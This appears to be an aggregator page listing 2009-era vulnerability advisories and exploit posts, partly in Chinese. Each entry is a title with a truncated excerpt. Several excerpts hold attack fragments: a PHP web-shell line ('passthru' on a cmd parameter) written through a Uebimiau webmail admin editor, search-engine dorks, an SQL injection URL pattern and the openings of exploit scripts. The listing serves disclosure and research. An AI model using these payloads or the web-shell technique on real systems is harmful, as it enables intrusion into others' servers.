Mozilla Firefox 'NPObject'访问远程代码执行漏洞

Bugraq ID: 35360 CVE ID：CVE-2009-1837 CNCVE ID：CNCVE-20091837 Mozilla Firefox是一款开放源代码的WEB浏览器。 Mozilla Firefox访问NPObject JS封装类对象的私有数据时存在竞争条件错误，远程攻击者可以利用漏洞以应用程序权限执行任意指令。 当访问NPObject属性一个封装的JSObject时NPObjWrapperNewResolve存在竞争条件错误，在装载Java...

DB Top Sites 1.0 Remote Command Execution Exploit

Exploit for unknown platform in category web applications ================================================= DB Top Sites 1.0 Remote Command Execution Exploit ================================================= ?php / ------------------------------------------------------------ + About DB Top Sites...

'Compress::Raw::Zlib' Perl模块远程代码执行漏洞

Bugraq ID: 35307 CVE ID：CVE-2009-1391 CNCVE ID：CNCVE-20091391 Compress::Raw::Zlib是一款Zlib压缩库提供perl低级接口的模块。 Compress::Raw::Zlib inflate存在缓冲区溢出，远程攻击者可以利用漏洞使应用程序崩溃或以应用程序权限执行任意指令。 Zlib.xs中的"inflate"函数存在单字节错误，当处理特殊构建的压缩数据时存在堆缓冲区溢出，可导致perl进程关起或崩溃。 Compress::Raw::Zlib 2.015 Compress::Raw::Zlib 2.014 升级程序...

Uebimiau Web-Mail 3.2.0-1.8 File Overwrite

Uebimiau Webmail After That Click Write To File Go /uebimiau/index.php?cmd=id See Pic :http://www.almlf.com/get-6-2009-almlfcomakszizl2.png Thanx To ... | || \ \ \ / / / \ / | ---| |----| | | \ / / / ^ \ | | | | | / \ / / /\ \ | | | | | | | |\ ----. | | / \ | || | || | | .| || // \ | . . / \ /...

Uebimiau Web-Mail <= v3.2.0-1.8 Remote File / Overwrite Vulnerabilities

No description provided by source. Uebimiau Webmail = v3.2.0-1.8 Remote File / Overwrite Vulnerabilities Dork : Uebimiau Webmail v3.2.0-1.8 POC : /uebimiau/admin/editor.php?load=config And You Can Write Any Code As ?php passthru$GETcmd; ? After That Click Write To File Go /uebimiau/index.php?cmd=...

Uebimiau Web-Mail 3.2.0-1.8 - Remote File Overwrite

Uebimiau Web-Mail 3.2.0-1.8 - Remote File Overwrite Uebimiau Webmail After That Click Write To File Go /uebimiau/index.php?cmd=id See Pic :http://www.almlf.com/get-6-2009-almlfcomakszizl2.png Thanx To ... | || \ \ \ / / / \ / | ---| |----| | | \ / / / ^ \ | | | | | / \ / / /\ \ | | | | | | | |...

mrcgiguy freeticket - Cookie Handling / SQL Injection

MRCGIGUY FreeTicket Multiple Remote Vulnerabilities Founder: ThE g0bL!N ------ Home: http:/www.4ckx.com/dz/ ---- Download: http://www.mrcgiguy.com/cgi-bin/freedown.cgi?id=1 Vendor:http://www.mrcgiguy.com Special Thx: Snakespc His0k4 Note: Algerie 3-1 Egypt Exploit: ------ Cookies insecure...

Virtue Shopping Mall (cid) Remote SQL Injection Vulnerability

No description provided by source. CMS : Virtue Shopping Mall WEB : http://www.virtuenetz.com/mall/ Archivo : products.php Variable Tipo : GET valor : cid Tipo : SQL Injection URL : http://www.site.com/products.php?cid=SQLI Exploit : ? $web = $argv1; $url =...

Virtue Shopping Mall - cid SQL Injection

Virtue Shopping Mall - cid SQL Injection CMS : Virtue Shopping Mall WEB : http://www.virtuenetz.com/mall/ Archivo : products.php Variable Tipo : GET valor : cid Tipo : SQL Injection URL : http://www.site.com/products.php?cid=SQLI Exploit : undersec@Undersec:/Escritorio$ php exploit.php...

Linksys WAG54G2 Web Management Console Arbitrary Command Exec

No description provided by source. 1. Linksys WAG54G2 router is a popular SOHO class device. It provides ADSL / WiFi / Ethernet interfaces. 2. When logged into web management console, it is possible to execute commands as root tested on firmware: V1.00.10. 3. PoC: GET...

ecshop 2.6.2 Multiple Remote Command Execution Vulnerabilities

No description provided by source...

Traidnt Up 2.0 (Auth Bypass / Cookie) SQL Injection Vulnerability

No description provided by source. || || | || o,7 || . o7 || q||| ow, : / / . =By: Qabandi =Email: iqaahotmail.fr From Kuwait PEACE =Vuln: Traidnt Up version 2.0 Auth Bypass / Cookie SQL Injection Vulnerability =INFO: http://traidnt.net/vb/showthread.php?t=943260 =BUY: ---- =DORK: ----...

Evernew Free Joke Script 1.2 SQL Injection

@=======================================@ ============taRentReXx=================== The Indian Hacker @=======================================@ @=Author : taRentReXx @=Email : [email protected] @===============INDIAN=================@ @=======================================@ @=Script :...

Dokuwiki 2009-02-14 File Inclusion

Dokuwiki 2009-02-14 Remote/Temporary File Inclusion exploit tested and working I was reading: http://www.milw0rm.com/exploits/8781 by girex quote It's not a RFI couse use of fileexists function. /quote How wrong brother! trick 1 ftp:// wrapper with php 5: needs registerglobals = on allowurlfopen ...

COWON America jetCast 2.0.4.1109 Overflow

?php / COWON America jetCast 2.0.4.1109 .mp3 local heap buffer overlow exploit xp/sp3 by Nine:Situations:Group::pyrokinesis site: http://retrogod.altervista.org/ software site: http://www.jetaudio.com/ Tested against JetAudio pack v.7.5.2...

Gallarific - user.php Arbirary Change Admin Information

Gallarific - user.php Arbirary Change Admin Information gallarific exploit change password Founder : Email: Script: HOME hhttp://www.gallarific.com/ Note:after change password go to...

ECSHOP Mall system filter is not strict lead to SQL injection vulnerabilities-vulnerability warning-the black bar safety net

Add time: 2009-05-25 System number: WAVDB-0 1 4 3 1 Affected version: ECSHOP 2.6.1/2.6.2 Program description: ECSHOP is an open source free online store system. By the professional development team upgrade and maintenance, to provide you with timely and efficient technical support, you can also...

ZaoCMS (PhpCommander) - Arbitrary File Upload

|| || | || o,7 || . o7 || q||| ow, : / / . =By: Qabandi =Email: iqaahotmail.fr From Kuwait PEACE =Vuln: ZaoCMS PhpCommander - Arbitrary File Upload =INFO: http://zaocms.com/ =BUY: http://zaocms.com/ =DORK: -- @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@-File-Upload-PoC-@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ Go to:...

Microsoft IIS 6.0 WebDAV Remote Authentication Bypass Exploit (patch)

Exploit for windows platform in category remote exploits ===================================================================== Microsoft IIS 6.0 WebDAV Remote Authentication Bypass Exploit patch ===================================================================== And the patch itself:...

OnlineRent 5.0 SQL Injection

---------------------------------------------------------------\ \ / / OnlineRent v5.0 Remote SQL injection \ \ / ---------------------------------------------------------------/ Author : UnderTaker HaCkEr Dork : A© MY LTD 2008 . ALL RIGHTS RESERVED Dork2 : allintitle:V45 TEMPLATE Vendor :...